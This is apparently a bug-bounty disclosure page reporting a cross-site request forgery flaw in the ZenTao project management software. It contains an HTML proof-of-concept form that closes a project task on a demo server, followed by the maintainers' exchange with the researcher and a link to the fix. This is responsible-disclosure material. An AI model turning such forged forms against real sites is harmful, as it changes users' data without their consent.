Cross-Site Request Forgery (CSRF) in easysoft/zentaopms

Valid

Reported on

Jul 28th 2021


✍️ Description

When you don't set the SameSite attribute of cookies the browsers have special act in front of this issue.(I mean set default value on it) chrome and chromium based browsers set the attribute "Lax" that mean if you do add/delete/alter operation in a get HTTP request then your site more vulnerable with CSRF attacks.

But Firefox and safari ( one of big ones ) don't set this attribute to "Lax" and set it to "none" that makes all POST and GET requests more Vulnerable to CSRF attack.

In Firefox and safari I can close/edit any project task With CSRF that users already allowed manually do it.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.zentao.pm/task-close-104.html?onlybody=yes" method="POST">
      <input type="hidden" name="status" value="closed" />
      <input type="hidden" name="comment" value="nothings&#33;&#33;&#33;&#32;&#58;&#41;&#41;&lt;br&#32;&#47;&gt;" />
      <input type="hidden" name="uid" value="6101a5cf9d997" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Here you should run PoC.html, after click on button you can see an Project task with id equals to 104 have been closed.

💥 Impact

This vulnerability is capable of close/edit any project task of any user.

We have contacted a member of the easysoft/zentaopms team and are waiting to hear back 4 months ago
amammad
4 months ago

Researcher


hey easysoft team if you want any help or suggestions on these vulnerabilities, just tell me.

amammad
4 months ago

Researcher


@admin

Hey man how are you today? :)

the maintainer said can't find any link related to this report:

https://github.com/easysoft/zentaopms/issues/69#issuecomment-892313848

Jamie Slome
4 months ago

Admin


I am forwarding this to Ziding to look into further. Cheers!

Ziding Zhang
4 months ago

Admin


Hey amammad, I've sent another email to them for you.

We have contacted a member of the easysoft/zentaopms team and are waiting to hear back 4 months ago
We have contacted a member of the easysoft/zentaopms team and are waiting to hear back 4 months ago
easysoft/zentaopms maintainer
4 months ago

Hello, we have received the reports and we'll check the issue.

amammad
4 months ago

Researcher


yah sure, If you want any idea for fix these vulnerabilities I can help you.

easysoft/zentaopms maintainer
4 months ago

Hello, we have received the email and will check it soon. Thanks a lot.

easysoft/zentaopms maintainer
4 months ago

We will release a patch soon.

amammad
4 months ago

Researcher


Thanks for your quick fix...

can you just validate my reports until the patches release please ?

easysoft/zentaopms maintainer
4 months ago

Thanks for your reports. I am a contributor of zentaopms. If we fix it, I will notice you.

amammad
4 months ago

Researcher


Hey zentaopms team, I just want to sure that you hadn't any problem, if you want any Fix suggestion tell me and be free.

xia0ta0
4 months ago

Hello amammad, I enabled the csrf protection in zentaopms. The commit can fix the vulnerability. https://github.com/easysoft/zentaopms/commit/cb40696190d69efd95df055abbd330ab2cb72008

easysoft/zentaopms maintainer validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
easysoft/zentaopms maintainer
4 months ago

We have fix the issue in github. When we fix the issue on huntr, the system need to select the fixer to be reworded, there's only nobody to be selected. Is that ok?

amammad
4 months ago

Researcher


yah it is ok, no problem.

Can you validate other CSRF Reports that i reported them in different endpoints?

amammad
4 months ago

Researcher


can you give me any feedback about last comment?

amammad
4 months ago

Researcher


if you have a problem with system you can use @admin in your comment to get answer from them

easysoft/zentaopms maintainer confirmed that a fix has been merged on 5a9f7f 4 months ago
The fix bounty has been dropped
easysoft/zentaopms maintainer
4 months ago

@admin >> Can you validate other CSRF Reports that i reported them in different endpoints? Where're can I find these reports?

amammad
4 months ago

Researcher


hey dear @xia0ta0 and easysoft team, if you already registered on huntr.dev you can see the content of following reports :

https://www.huntr.dev/bounties/c4c79696-4431-4eb7-a334-1e2c766de86c/ https://www.huntr.dev/bounties/20099a57-8ea8-4c11-a46b-c1796b839f9c/ https://www.huntr.dev/bounties/8f04caa0-5545-4819-996a-a4701e4753aa/ https://www.huntr.dev/bounties/5690899e-9171-40bb-895a-77d015fa946f/ https://www.huntr.dev/bounties/98001390-98be-4dd9-8cf3-0c01cd02d2c4/ https://www.huntr.dev/bounties/00986980-56e7-4b3d-87e9-7eb29b320687/ https://www.huntr.dev/bounties/1c137804-4cb5-4bcb-be2e-68c33a6e04e5/

Jamie Slome
4 months ago

Admin


@maintainer - let me know if you need further support here!